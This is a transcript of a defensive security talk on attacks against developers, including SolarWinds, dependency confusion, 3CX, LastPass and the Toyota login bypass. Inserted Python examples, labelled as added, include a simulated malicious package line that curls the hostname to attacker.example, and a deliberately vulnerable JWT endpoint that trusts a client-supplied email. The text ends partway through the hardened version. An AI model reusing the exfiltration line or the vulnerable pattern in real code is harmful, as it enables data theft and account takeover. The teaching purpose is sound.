Tom here from Lawrence Systems. I am speaking at a private event, and the title of my talk is going to be "Defending Developers and Developing a Cybersecurity Strategy to Defend Them." Now, this talk has a lot of slides, and I thought for YouTube I'd give it a different name. It's going to be called "Code of Armor: Defending Your Team Against Cyber Threats." So for those of you that were interested in me having a video version of this talk, that's what this is. All the slide decks, links and sources for all this information I put together are also going to be included in the description down below. It may or may not be the type of video you want, but I wanted to make sure it's publicly available for those that are interested in watching this video, so you can go through all these resources. It's actually going to be a lot I have to say in terms of the different attacks as I go through them, but this is what my presentations look like. It's going to be a little strange just not being in front of an audience doing it, but I will do my best to go through the slides and explain them. Let's get started.

Code of Armor: building resilience against cyber threats for developers. I'm your presenter, Tom Lawrence. I'm an IT services solution provider and open source advocate. I design network, storage and virtualization solutions. I like hanging out with the red teams; I'm a blue team defender in practice; I keep a purple team mindset, which means I kind of have to be on both sides of the fence, really thinking about how the attacks happen and, of course, how to defend against them.

Let's start with who we're defending against, and that's threat actors. Who are they?
What are they after? How have they evolved? Who are they? Really anyone who wants your information, if we broadly define it, but there are really two different types that are primarily seen. It's going to be your nation-state actors, which are going to be embedded deep into systems, looking more probably for espionage, not necessarily to create chaos. Of course, sometimes they may want to, depending on which nation-state it is. But the majority, the ones that you see and hear about in the news, are going to be ones that are simply after monetary gain. That is mostly what they're after; espionage is a piece of it, and those are your relatively sophisticated ones, but the common ones we're seeing more than anything else across the small business and even some of the larger enterprise spaces, you know, ransomware being probably the king thing you see in the news when it comes to cybersecurity, are going to be ones that are after monetary gain.

The rise of ransomware as a service: just like the business models that we have for our companies, ransomware as a service is exactly like it sounds. They put a business model and a plan around it. They have really become a group of sophisticated individuals. This started out pretty small in terms of the types of attacks and how they scaled them and the way threat actors would leverage, you know, ransoming you, and it took a skilled threat actor to manage the software, manage the exploits, and this was not something that scaled very easily. Just like the SaaS business of getting people to put things into the cloud, one team who's really good at managing that aspect, that component, can get really good at it. Ransomware as a service really expanded this: a developer creates a specific ransomware code, the code is sold to the affiliates, the affiliates spread the malware and payment is in cryptocurrency, and the money is divided between the developer and the affiliates. It's just like any other SaaS program.

It's software as a service that you can use; it just happens to be software that encrypts files. It is a really advanced marketplace they have, with the affiliate systems, with the companies behind it, with the way they track the payments. It's actually really, really talented people who are writing it. It's unfortunate they're writing things for, well, the wrong side of the law here, but they don't really see this as something bad that they're doing. In interviews that you can find with them, they frequently think of themselves as the heroes, as they're just pointing out that there are flaws in these things and leveraging those flaws, and your insurance companies are paying for it, so they're not really causing any real harm. They're really not thinking very deeply as far as the actual damages they cause to the businesses.

They're often in foreign countries. They don't have any direct consequences until they step over the line too much. The smaller operators generally can operate almost with impunity in terms of getting caught or actually worrying about something happening to them. It's usually when they step on the wrong company, hit some critical infrastructure, that things can go awry for them. And it's not that the people at the government don't care; it's just that it's such a widespread problem that it's hard to get the resources to actually go after the smaller ones. But when the bigger ones come out, this is what happens.

Now, in the past we simply had the spam botnet, the ransomware peddlers, the ransomware operator and the victims, and ransomware as a service kind of breaks these all down to be different people, and the ransomware operator service has really expanded the victims. So the ability for one RaaS operator to kind of use their automation tools to deploy this at scale is absolutely amazing.
They kind of form, essentially, criminal groups. You can look at them in some ways as a business, the business just being something illegal, but they are pretty organized with a hierarchy and have an entire org chart and a group of people that do this. So they're not just some amateurs. It's not just a couple of people working out of a state such as Russia where they can't be extradited. It's really an advanced group that can be a little bit more expanded than just one geographical area, but they're usually going to be in non-extradition areas.

Now, one of the things that's really split up and expanded with the threat actors is the initial access brokers. These are marketplaces, essentially. So the initial access broker marketplaces have expanded now to really go wild and include all these people who go, "Hey, I have access, I want to sell," and that's all they do is sell access. So all the other parts can be broken down by different adversaries, but they don't even have to target you now. There are people who, maybe they have a friend, maybe there's someone trying to sell access from the inside, an inside actor doing this, maybe they've just found something and they're like, "Oh cool, I don't want to deal with the illegal side of actually doing this," and that's where the initial access brokers can be even more than just people in a non-extradition area. If someone has some skills, instead of finding some flaw and reporting it, they go, "I can go throw it over on this marketplace," and that kind of removes them a little bit from it. I mean, obviously in any legal terms, no. But it's not always that we know who the initial access brokers are. This has also created some opportunity for people to watch some of these marketplaces and determine if a company's information is available on there, and if you see that a company is for sale, they can identify what that company is. Sometimes that's not as easy as it sounds.

There was a large attack that we knew was looming. We knew someone had a large number of VMware servers that they had infiltrated, but the initial access broker was looking for a pretty big payout because of it being such a large company, and they gave few details, because it's not like they say the company name. They say, "We have a large number of VMware servers. I'm ready to action on this. I want someone to buy this. It's a US company, so they should pay the ransom." You know, these are some of the types of postings you'll get. It's like anything for sale: they put a value on it based on the value of that target and how much they think they can sell it for, and then the race is on (this one was publicly known because of its scale and scope) to try to figure out who it was before they became another item in the news.

Now, it's not that our government does nothing about this. This question comes up a lot when I'm discussing with clients. Once someone crosses that line to get big enough, and as the resources get bigger for the government to go after these people, they are offering rewards to disrupt these ransomware groups. The FBI has taken an active role in disrupting them, infiltrating them.
So there is some good news on there. There are just so many of them, and the non-extradition part makes it particularly hard. But offering rewards to other people, because criminals have no honor among themselves, means sometimes they may turn each other in for this. And so I think there's still some progress being made. So that's as far as I'll go on the ransomware and the threat actors, because that's as much as I'm going to talk about there. Let's talk about the actual attacks that they perform and how they're targeting developers.

We're going to start with: do the acronyms save us? Because there are a lot of people that just assume they're safe. What about these acronyms: AV, next-gen AV, EDR, MDR, XDR, SIEM, SOC? Don't they all solve the problem? In reality, not really, but they're getting better. These are way better tools than they were before, so the defenses are getting better, but they're not foolproof. You still have to have a plan. It is great that they've moved these forward, that we've got tools that are really more challenging for these people to get through and give us more intel and let us action on things, but they're still not the end-all that solves all problems. They are a big help, though.

The other argument is "it won't happen to me." I just want to put this out there because this is something that a lot of people don't realize, and it's something that I deal with a lot where companies are a little bit smaller, especially if you're in a startup phase: no one's going to bother writing a news article. That's because your company is not too small to be attacked, but it's probably too small to make the news. Even if you're a small business and a startup and you got funding, and maybe someone patted you on the back for this funding and you've got some excitement around it, if you don't make it and it doesn't make the news, or no one bothers to write it because there are a lot of NDAs wrapped up in this when an event happens, you just go, "Well, I guess that startup that received ten million dollars didn't make it," because, well, they got hacked, and we don't know that they got hacked unless there's a public disclosure of it. And if they haven't reached that many customers, if they haven't really gotten into any fields that require reporting like an SEC-registered type company does, then it may just not make the news at all. And this is something that happens frequently. It's one of those perception problems where "I only see big companies in the news, therefore it must only happen to big companies."
That's just not how this works.

"Developers, developers, developers," as he famously ranted on the stage. Yes, they are the targets, and a big piece of why I'm doing this talk here is because the attackers have realized it. It's one of those things where the tools that I mentioned are making some things harder, but when you talk about getting into a developer, the person who generally has the most levels of privilege because they need it, they are becoming a more focused target, because this also allows them, as with the companies we're going to talk about, to get into the other companies that may be the further-down-the-pipe target. So by targeting the developers and the software they make, this gives them that edge they need to get by all those tools, because we trust the software. It was developed, and if it was developed and something nefarious was placed in it, that trust follows through, because they don't know there was something compromised. This is why developers are such a big target right now.

SolarWinds. This is the one that had the most fame, simply because it absolutely was an amazing attack. It was very sophisticated. I know there are all the jokes going around about solarwinds123, weak passwords, etc. But there's a lot more to this attack, because this attack was an absolutely sophisticated, brilliant attack, and I don't say that lightly. I'm not looking in admiration at the threat actors that did this in any way other than for the skill and the tactics and techniques. The SolarWinds attackers ran a masterclass in novel hacking techniques: modified sealed software code, used domain names to select the targets, mimicked the Orion software communications protocols, and cleaned the crime scene. That is brilliant when it comes to tactics and techniques. Normally they don't back all their software back out. Normally they don't target by domain; they're happy to get in places. But they very judiciously went through each one of the infected clients, figured out which domains these infections were coming from, so they had a lot of reconnaissance, and once they realized they had a target that they wanted, they would then action on that.

Modifying sealed software code: they modified the build server so that the code going in and the code going out always looked like it built properly, even though it had extras. That's outstanding. They mimicked the Orion communications protocols, so they looked at how the Orion software communicated and then embedded, essentially, telemetry within that. So even for those looking at it with their tools and looking at the network connectivity, they took the time to mimic it. It wasn't just firing off some random "here's some domain it's going to go to" type of noise; it's actually mimicking the protocols, and you had to kind of decipher, oh, in between the numbers was where the data was going. These extras were added into this one when it actioned. That's really amazing. And cleaning the crime scene: who takes the time to hack a very large company and then remove all their tools? A really sophisticated threat actor who doesn't want to get caught.
There is a lot to this. I've got links if you want to dive deep into exactly how they did it, but it's something we're talking a little bit about, because it's definitely something pretty outstanding. The attackers started accessing SolarWinds all the way back in September. This was September 12. They start injecting code, then on November 4th they stop injecting the test code. They sit and wait till February 20th. Then from there they escalate in March to start the distribution of the backdoor; the distribution starts and only goes from March, and then starts in May, and then in June they remove it. Now they started doing some activation of what they called Teardrop. This was a tool where they were actually hands-on keyboard. They didn't want to show any automated tools that might get caught. But the fact that they removed it from the build environment, that they quit distributing the malware, meant all the subsequent releases that were going on afterwards were clean. So if you had someone in your network and you're trying to figure out how, you're like, "Oh, we updated SolarWinds," and by the way, we didn't find this until December 12th. So because this wasn't even found all the way until December 12th, you had all these other months where there were updates, and all those updates were clean. It was only when Mandiant was attacked that they were going, "We keep copies of all the old things that we installed." So Mandiant started rolling backwards to go through all their previous copies and ask, "Which one of these had something in it?" And that's what really triggered them to go, "All right, that's where it is." And that's why this is such a sophisticated attack. So from 2019, when they started injecting, all the way till we find it in December 2020, that's just a long time to be very, very patient just to collect data. And then to hand-do each one of these: they also took the time to laterally move into the network to other systems, so as not to alert anyone as to how they got there in the first place from the SolarWinds system. So that's why there's so much hands-on keyboard, very manual migration they did to get laterally into the network.

Let's go just a little bit deeper and talk about how it worked. So once you get on-premise, SolarWinds moves over to the Orion, finds the backdoor, it activates, the backdoor checks the environment, the backdoor gathers info. This is a lot of that initial hands-on part. Then it connects to the initial C2 server to gather the info, then they move over and set up Cobalt Strike for a second C2, then remote control via Cobalt Strike beacon, and that's where they have the Cobalt Strike C2. So they actually have multiple C2 servers, command and control servers, doing this, and each one of these being very hands-on. The initial gathering is trying to figure out what company they're in. That's where they only action against certain companies. This was just so carefully crafted, despite the absolutely incredible number of downloads. It's not like they attacked everyone. 18,000 was our best estimate for how many downloaded the code between March and June of 2020. That narrow number, and this was used, I believe, at about 400 of the 500 of the Fortune 500 companies. That is an incredible number to not action on all those companies. I think you had access to all these major companies, but then narrowed it down to a much smaller number of actual targets. Now let's go through some key takeaways.
The build server was not well audited or protected. That's ultimately how they got in and how they were able to do this. There was no alerting on unauthorized server access, so the fact that someone modified this build server did not raise alarms; things should be really locked down tight. In-depth validation would have identified an unauthorized change to the patched code. They did modify the build server to kind of ignore this, but once again, if you would have been really validating each step of the way, and the binaries of the build server itself, everything on there, and done a higher level of auditing, they should have noticed the patch in there. And a software bill of materials and network connections probably would have helped as well. This is something that's been challenging in the marketplace, to say, "Hey, are these expected connections in the spec on there?" Because this is something companies should really push for: when software is on their network, how would we expect that software to behave? What are the listed known sites that that software should go to, and all the different software that it was built with? This is just some pie-in-the-sky hopeful stuff that I like to throw in there because I'm standing in front of developers, or talking to developers, at this time.

Now let's move on to dependency confusion: "How I hacked into Apple, Microsoft and dozens of other companies." This got some fanfare, but I almost feel not enough, because this attack was so simple, so clever and so effective, and I don't feel it's completely fixed. Dependency confusion: `pip install package-name`. Installing dependencies for your projects has become very easy. This is great.

We're talking about Python here specifically, but this applies to other libraries as well that you may be building with. We have a lot of different external resources that we're going to pull when we're doing development, and those packages and resources are, well, under attack quite a bit more here in 2023. This goes back a couple of years, to prove that there are other ways to attack it, not just by poisoning an existing one, but by creating confusion on the dependencies of them. And there's a whole link I have to get into the real programming details of it. Let's talk about what actually happened here.

Simply put, they went and looked at an interesting piece of code, like a Node.js source code found on GitHub, and noticed that when PayPal and these other large companies are building their apps, you have dependencies, and the dependency order is: try to find these, and if these don't exist in the local library, go ahead and go out and pull them. Well, at least that's how a lot of people assumed it was working. It would actually do the opposite. It would look for a library outside of the build environment, and a lot of systems do this by default, a lot of the build tools do. So if there's a version outside, it'll pull that before it'll pull the local libraries that are built specifically for the client. Even worse if the version number is higher on the outside than on the inside. So if you had one where it does have an inside one and an outside one, and you bump the version number on your outside one, it'll pull that one ahead of the internal builds. And it seems like this wouldn't work. "What happens if malicious code is uploaded to npm under these names?" is the question that was asked. "Is it possible that some of PayPal's internal projects will start defaulting to the new public packages instead of the private ones?" Yeah, probably. "Will developers or even automated systems start running the code inside the libraries?"
That's the real question here. "Will this attack work against other companies, too?" So would this actually work? Would we be able to pull this code and make it work? Validating attacks with DNS: yeah, that's the good way to do it, because they didn't want to really go into executing something that would do something malicious. This was a security researcher trying to see if this works. So they set up some DNS calls to go outside of the network and reach out if these libraries did a thing. And, well, did it work? And the answer is: it worked for PayPal, Apple, Tesla, Shopify, Uber, Microsoft and more companies. At some point the person collected bug bounties for all of these and stopped doing it, because at some point you have enough companies and hopefully someone took notice that these companies were failing this simple out-of-order namespace squatting, essentially. Figure out what some of the internal library names are, which you can probably reverse engineer from some of the code (you can find some of this code out there; there are different methodologies they can use, or you can use, to figure out what libraries are being asked for), and then just put version numbers higher and put code out there that has the same name that didn't exist before, just creating the existence of it, and when it reaches out to do the build and pulls those external dependencies, here they come and execute on things.

Now let's talk about what we can do to stop that.

Utilize scopes and namespaces: ensure that your internal dependencies are pulled from private repositories and are defined with the appropriate prefix and scopes.

Secure the build environment: create a dedicated, locked-down, secure build environment with strict permissions, and monitor for vulnerabilities.

Validate hashes and checksums: whenever possible, validate that a dependency's checksum matches the one documented at the official package sources.

Vendor dependencies: rather than pulling dependencies from a private registry and public repositories on demand every time an environment is built, reduce the risk of dependency confusion by embedding the source code for all dependencies, internal and external, in your code repository.

I didn't say this was easy, by the way. I'm just saying these are suggestions for it. I know that's a lot, but it's something to consider when you're building these environments.

Now, I've used this graphic way too much: "all modern infrastructure" resting on "a project some random person in Nebraska has been thanklessly maintaining since 2003." This happens a lot in software development. There are so many different interdependencies. It is why the supply chain in some ways is very fragile, because there's always that one thing that, well, we find out is kind of what is going to pull the whole system down if that thing becomes compromised.

"Python Package Index had one person on call to hold back weekend malware rush. We speak to infra director after project temporarily freezes new user accounts." The Python Package Index, home to more than 455,000 Python code repositories, closed itself to new users and projects over the weekend because it could not deal with a rush of efforts to create malicious accounts and code libraries. They had to stop it, because, I mean, granted they have more people, but one person was on call and it's causing that much of a problem. Python is incredibly important. Many of you probably develop in Python, but this doesn't only apply to Python. This problem is pretty widespread.

We even see supply chain attacks against things like VS Code: "Malicious extension detected with more than 45,000 downloads, exposed backdoors and enabled..." This one was simply called Dark Dracula. Actually, I thought they did a nice job; they made a little icon for it.
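The resolution behaviour described above, and two of the mitigations that follow it (scopes/namespaces and hash validation), as an added example. This is not code from the talk, from the original research, or from any real package manager; it is an in-memory simulation with a hypothetical `acme-` internal prefix, constructed package contents and constructed indexes, so it runs offline. `resolve_confused` merges both indexes and lets the highest version win, which is how the public squat beats the real internal package; `resolve_hardened` never consults the public index for internal names and refuses any artifact whose hash differs from the recorded pin.

```python
"""Dependency-confusion resolver simulation (added example, not the talk's code).

Models two resolution policies over small in-memory indexes:
  * "highest version across every index wins": the behaviour that let a public
    look-alike package beat an internal one; and
  * "internal names only from the private index, then verify a pinned hash".
"acme-" is a hypothetical internal prefix; all package bytes are constructed.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Candidate:
    name: str
    version: Tuple[int, ...]
    source: str      # "private" or "public"
    payload: bytes   # stand-in for the package archive (constructed)

    def sha256(self) -> str:
        return hashlib.sha256(self.payload).hexdigest()


Index = Dict[str, List[Candidate]]

# Constructed indexes. The attacker has published the internal name on the public
# index with an absurdly high version, exactly as in the research described above.
PRIVATE_INDEX: Index = {
    "acme-internal-utils": [
        Candidate("acme-internal-utils", (1, 4, 0), "private", b"legitimate internal code"),
    ],
}
PUBLIC_INDEX: Index = {
    "acme-internal-utils": [
        Candidate("acme-internal-utils", (99, 0, 0), "public",
                  b"setup.py: os.system('curl attacker.example/$(hostname)')"),
    ],
    "requests": [Candidate("requests", (2, 31, 0), "public", b"requests")],
}

# A private index whose artifact was altered after the hash pin was recorded.
TAMPERED_PRIVATE_INDEX: Index = {
    "acme-internal-utils": [
        Candidate("acme-internal-utils", (1, 4, 0), "private", b"legitimate internal code + implant"),
    ],
}

INTERNAL_PREFIX = "acme-"   # namespace reserved for internal packages (assumption)

# Hash pins recorded when the internal package was last vetted.
PINNED_HASHES: Dict[str, str] = {
    "acme-internal-utils": hashlib.sha256(b"legitimate internal code").hexdigest(),
}


def _highest(cands: List[Candidate]) -> Candidate:
    return max(cands, key=lambda c: c.version)


def resolve_confused(name: str, private: Index = PRIVATE_INDEX,
                     public: Index = PUBLIC_INDEX) -> Candidate:
    """Vulnerable policy: merge every index and take the highest version.

    This is what a client configured with a private index plus a public
    fallback does; the 99.0.0 squat wins over the real 1.4.0 package.
    """
    cands = private.get(name, []) + public.get(name, [])
    if not cands:
        raise LookupError(name)
    return _highest(cands)


def resolve_hardened(name: str, private: Index = PRIVATE_INDEX, public: Index = PUBLIC_INDEX,
                     pins: Dict[str, str] = PINNED_HASHES) -> Candidate:
    """Hardened policy: scope internal names to the private index, then pin.

    Raises LookupError if the name is absent from its allowed index and
    ValueError if the chosen artifact does not match its recorded hash.
    """
    allowed = private if name.startswith(INTERNAL_PREFIX) else public
    cands = allowed.get(name, [])
    if not cands:
        raise LookupError(f"{name}: not in the allowed index")
    chosen = _highest(cands)
    expected = pins.get(name)
    if expected is not None and chosen.sha256() != expected:
        raise ValueError(f"{name}: hash mismatch, refusing to install")
    return chosen


def squatted_internal_names(requirements: List[str], private: Index = PRIVATE_INDEX,
                            public: Index = PUBLIC_INDEX) -> List[str]:
    """Internal names that also exist on the public index: confusion candidates to check first."""
    return sorted(n for n in requirements if n in private and n in public)


if __name__ == "__main__":
    for pkg in ("acme-internal-utils", "requests"):
        c = resolve_confused(pkg)
        print(f"confused  {pkg}: {'.'.join(map(str, c.version))} from {c.source}")
        c = resolve_hardened(pkg)
        print(f"hardened  {pkg}: {'.'.join(map(str, c.version))} from {c.source}")
    print("squatted:", squatted_internal_names(["acme-internal-utils", "requests"]))
    try:
        resolve_hardened("acme-internal-utils", private=TAMPERED_PRIVATE_INDEX)
    except ValueError as err:
        print("rejected:", err)
```

The real-world equivalents: with pip, `--extra-index-url` merges indexes with no priority between them, so internal packages should be served through a single `--index-url` (a private index or proxy that owns the internal namespace), and `pip install --require-hashes -r requirements.txt` with `--hash=sha256:...` entries gives the pin check; with npm, publishing internal packages under a scope such as `@acme/...` that the public registry does not serve plays the role of `INTERNAL_PREFIX`.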
We see 45,000 downloads because, hey, "it's an attempt to improve Dracula colors consistency on VS Code, making it more pleasant to the eyes during coding sessions," which is very important to any developer, and even me. You know, I like dark mode, and I would get the Dracula dark mode. I would click on an icon that looked like that; that seems cool. And apparently 45,000 people did, but now you have something in your Visual Studio Code, from the marketplace for Visual Studio, the watering hole for developers to grab some of these things, and it took a while before it got detected. This was just in May of 2023.

Now we can jump over here to a supply chain attack that Mandiant has a really nice write-up on: 3CX. 3CX is a large phone provider. They provide to a massive number of the Fortune 1000 companies and many, many more small businesses. They compromised the supply chain of 3CX. Specifically, this turned out to be North Korea, and their goal was cryptocurrency, stealing it. They had a very narrow scope of companies they were targeting, but they knew those companies that worked in the crypto space used 3CX, and they wanted to get inside their networks, and what better way to do it than build your threat into the 3CX software? The way they did this was really clever. They compromised a company called Trading Technologies that made some day trading software. Now, I don't know if this is coincidence or back to the initial access brokers, but whoever compromised that software realized a developer at 3CX had loaded the compromised trading software on the same system that builds the 3CX desktop app. So that combination of information, whether it was them doing it initially or it was sold on a broker market, was then activated, and they took this infection and backdoor they had on this developer's computer to start inserting themselves into the 3CX software supply chain. And from there, with the software pushed out, they decided which people they wanted to attack. This was also a very narrow scope. They didn't activate this everywhere. It wasn't even initially caught very well; it was actually very tricky to figure out how they were going to catch it. And they said, "All right, which ones are we going to activate on?" They had kind of a target list. If they were in certain environments, then it would actually do a second stage of it. So it's not that they had the full backdoor in this tool. They had only part of it, and then it would pull down the second stage if it was on the right target machine in the right target environment. That's how they targeted their victims. It kind of helps evade detection, but they still did get detected. They didn't really seem to get all the way to their target with this one, but it definitely sent out some warning signals, because they could have changed it up later, because it reached out and beaconed, and it only sent back if it was in the target. But once they were discovered, for reasons I'm not sure of, maybe they didn't want to create chaos, they could have probably actioned more companies, because this got distributed pretty broadly before it was caught. It was actually out in the market for probably five or six days before people really stopped and said, "No, no, we think there's a backdoor, there's a problem with this," and things have definitely gone awry.

Now let's talk about LastPass. A lot of people have heard of them. They're a very popular password solution, and they made some really poor mistakes that led to their own supply chain compromise. Once again, they targeted the developer. They were able to use the developer's privilege to pivot access and gain access to source code, gain access to storage buckets and some of the archive backups they have. So they got pretty deep into the system, and they did so because their engineer had failed to update Plex software.
It led to a massive data breach. I can't really think of a business use case for having Plex software on this, no more than I can think of a business use case for day trader software being on the developer's laptop that develops the 3CX software. Both of these are huge problems that were, "Hey, we've got this infected version," or, in Plex's case, there was actually a flaw in it that was able to be exploited. Also weird that Plex, I'm assuming, was publicly exposed for them to leverage this. I remember when this patch came out, and it also came out a while ago, so this was either someone who was embedded for a long time with this particular system, or they installed an old version more recently. It's a little fuzzy exactly how that happened. Either way, I can't think of any good reason any developer should be running Plex on the system that signs software, that builds the LastPass product.

Let's talk about solutions to some of these problems.

BYOD: don't allow "bring your own disaster." This is something that people ask us a lot, and we just say, "Please, no." We don't want to try to secure your laptop, which we only get partial control over, to log into things. Your personal computers can be your personal computers; business ones are business ones, especially if you're a developer and you are developing software. This gives a high level of access. It's not that expensive to buy a computer. It's way less expensive than any breach that you may suffer from this. So just don't bring your own disaster.

Software policies: know what's on the system and why. Lock it down to only what's necessary and no more. That is an absolutely critical piece of this.

Separate systems: email and communication are not on the critical server, and have different credentials for privileged tasks, having this all separated out. I have friends that work in development in highly secure environments, and they have to deal with the pain in the butt of "I can't have my email and my Slack on the same one I actually sign the code on." But they go, "That's life," and this helps keep things very separate, because if they did click a phishing email, you physically can't jump over to the laptop sitting next to them; it's a lot harder to do.

Forensics and backups: systems used for development should be monitored closely and have long-retained backup revisions. This helps the forensics teams, because Mandiant was able to catch the entire SolarWinds attack because they had revisions of all the previous versions. Every time there was an update to SolarWinds, they had another backup of it. So it allows you to go, "When did this get here? If we suspect it was from this particular computer, do we have a series of revisions on this so we can go back?" Because maybe the threat actor removed themselves from it, maybe they erased the computer as the final act, and without any forensics to go backwards on, you may think, okay, they back up the code that's on it, but they don't really back up the computer. It's good if you can, if you have the storage, if you have the ability, to have an entire snapshot done on a regular basis with a long retention time for that computer. Highly recommend it.

Honey tokens and honeypots: have these on your network, your file system, documents, etc. They are high-fidelity ways to know if someone touched something.
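The mechanics behind the credential-style honey token described here, as an added example that is not from the talk and is not the canary.tools service: mint a key ID with the same shape as a real AWS access key, plant it in a decoy credentials file, and alert the moment that key ID shows up in authentication logs. The log lines are constructed inline in a CloudTrail-like JSON shape, the key IDs are constructed, and no cloud call is made. A token minted by a provider would be detected the same way; only the `scan_events` side would run against your real log feed.

```python
"""Honey-credential planting and detection (added example, not the talk's code).

Mint a key that looks real, render the decoy file it gets planted in, and
scan authentication events for any use of it. Any use at all is a hit:
legitimate users have no reason to touch the decoy, so the alert is
high-fidelity. Log lines below are constructed; no AWS API is called.
"""
import json
import re
import secrets
import string
from typing import Dict, Iterable, List, Set

KEY_ID_RE = re.compile(r"^AKIA[A-Z0-9]{16}$")   # shape of a genuine AWS access key ID


def mint_honey_key_id() -> str:
    """Random key ID with the same shape as a real key, so it looks worth trying."""
    alphabet = string.ascii_uppercase + string.digits
    return "AKIA" + "".join(secrets.choice(alphabet) for _ in range(16))


def render_decoy_credentials(key_id: str, profile: str = "default") -> str:
    """Body of a ~/.aws/credentials-style decoy file.

    The secret is random filler: it never needs to be valid, only tempting.
    """
    fake_secret = secrets.token_urlsafe(30)
    return f"[{profile}]\naws_access_key_id = {key_id}\naws_secret_access_key = {fake_secret}\n"


def scan_events(lines: Iterable[str], honey_keys: Set[str]) -> List[Dict[str, str]]:
    """One alert per event whose accessKeyId is a planted key.

    Non-JSON lines and events without the field are skipped rather than
    crashing the detector. A denied call counts: the key is not valid, so an
    AccessDenied on GetCallerIdentity is exactly what an attacker probe looks like.
    """
    alerts: List[Dict[str, str]] = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        key_id = (event.get("userIdentity") or {}).get("accessKeyId")
        if key_id in honey_keys:
            alerts.append({
                "key_id": key_id,
                "source_ip": event.get("sourceIPAddress", "?"),
                "event": event.get("eventName", "?"),
                "time": event.get("eventTime", "?"),
            })
    return alerts


# Constructed token and log sample. The first event is normal activity with a
# real (also constructed) key, the second is noise, the third is an attacker
# trying the decoy key from an address that has no business with the account.
HONEY_KEY_ID = "AKIAEXAMPLEHONEY0001"
SAMPLE_LOG = [
    '{"eventTime":"2023-05-01T09:00:00Z","eventName":"ListBuckets",'
    '"sourceIPAddress":"10.0.0.5","userIdentity":{"accessKeyId":"AKIAREALUSERKEY00001"}}',
    "not json at all",
    '{"eventTime":"2023-05-01T09:01:10Z","eventName":"GetCallerIdentity",'
    '"sourceIPAddress":"203.0.113.77","errorCode":"AccessDenied",'
    '"userIdentity":{"accessKeyId":"AKIAEXAMPLEHONEY0001"}}',
]


def demo() -> List[Dict[str, str]]:
    """Run the detector over the constructed sample with the constructed token planted."""
    return scan_events(SAMPLE_LOG, {HONEY_KEY_ID})


if __name__ == "__main__":
    print(render_decoy_credentials(mint_honey_key_id()))
    for alert in demo():
        print("ALERT honey token used:", alert)
```

The same pattern applies to the document tokens the talk mentions: the planted object carries an identifier nobody legitimate will ever present, and detection is a lookup of that identifier in whatever log records its use.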
There's a lot of stuff you can do with like the free canary tokens They're simple easy. They're Provided by canary dot tools and there's plenty of other ways to do this besides canary tokens I just bring them up because they have a free service for doing this They let you sprinkle around things like some of the Amazon tokens And they look like real tokens and the threat actor cannot resist checking them and checking in will alert you You can also create certain files and documents that do similar where you can have alerts sent to you going someone touched that and what you Do is you just name these documents? Certain things that you know the developers may know not to touch them But the reactors getting in there don't these are some early warnings that something happened as opposed to Finding out months later when they've went through an entire maybe sold on a market and then got deep into your system Now let's talk about publicly exposing things and what goes wrong I am absolutely someone who pushes to put everything behind a VPN But then the business world slaps me and says no time you're gonna make it really inconvenient for people and You know why not just expose these apps because then the abusers can just log right in Before you do that, please do a lot of testing. 
We're gonna walk through Eaton Works. They are a security research group, a person, who absolutely did some amazing work here. They have several write-ups, but this one about Toyota happened earlier this year. We're gonna walk through it here: "Hacking into Toyota's global supply chain network." Toyota's GSPIMS is a web app used by Toyota employees and their suppliers to coordinate projects, parts, surveys, purchases and other tasks related to the global supply chain, and it was hacked by a security researcher, so nothing too bad yet here. System admin access was achieved through an accidentally introduced backdoor, part of the user impersonation "act as" feature. Any user could be logged in to just by knowing their email, completely bypassing the various corporate login flows. The issue was responsibly disclosed to Toyota in November 2022 and fixed in a timely manner. So good on them for that, but let's walk through what happened here.

The code and the links are all down there so you can look closer, but basically they found in the login screen that you could patch the code to return true. Literally that simple. And I actually like it because it says, "Hello, welcome to GSPIMS. Are you a Toyota user? Are you a supplier?" and the comment from the security researcher goes, "They should have had one that says, 'Are you a hacker?'" as an option, because the fact is that you could go in and, you know, press that really hacky key, F12, and start pushing in and modifying the code right in your browser and say, "Let's just set these to return true and see if it lets us log in." And they patched the code also to remove the logout code, so you can actually just delete that, and that got them completely into the Toyota supply chain network. Yeah, I'm kind of blown away, but it kind of makes me feel that this never went through any real application testing prior to it getting out into the real world. Reporting it to Toyota, though: what happened here?
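Before the disclosure timeline, an added example (mine, not Eaton Works' or Toyota's code) of why patching the browser's check to "return true" was enough: the server minted a session token from nothing but a client-supplied email, so the client-side login check was never the real gate. The token-issuing endpoint is written twice, the vulnerable form beside a hardened one that only accepts identity from a session the corporate login flow already established and answers 400 to a client-asserted email. The HS256 helper, the signing key, the user directory and the SSO-session table are assumptions.

```python
"""Client-asserted identity versus server-established identity at a token
endpoint. Added example, not Eaton Works' or Toyota's code. SECRET, USERS,
the SSO session table and the minimal HS256 JWT helpers are assumptions."""
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import time

SECRET = b"server-side-only-signing-key"      # assumed; never shipped to the browser
USERS = {                                      # assumed directory
    "admin@example.com": {"role": "system_admin"},
    "supplier@partner.example": {"role": "supplier"},
}


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict) -> str:
    """Minimal HS256 JWT: header.payload.signature, all base64url."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64(sig)}"


def verify_jwt(token: str) -> dict | None:
    """Return the claims if the signature checks out and the token is unexpired."""
    try:
        header, payload, sig = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_unb64(sig), expected):
        return None
    claims = json.loads(_unb64(payload))
    return claims if claims.get("exp", 0) > time.time() else None


# VULNERABLE (the pattern behind an "act as" backdoor): identity comes from the
# request body. Whatever the browser's login check returns is irrelevant;
# anyone who can send {"email": ...} gets a valid token for that user with no
# password and no SSO step.
def create_jwt_vulnerable(body: dict) -> tuple[int, str | None]:
    email = body.get("email")
    if email not in USERS:
        return 404, None
    return 200, sign_jwt({"sub": email, "role": USERS[email]["role"],
                          "exp": int(time.time()) + 3600})


# HARDENED: identity comes only from a session the corporate login flow already
# established server-side. A client-asserted email is refused outright, which is
# the same effect as the fix of making the endpoint answer 400 unconditionally.
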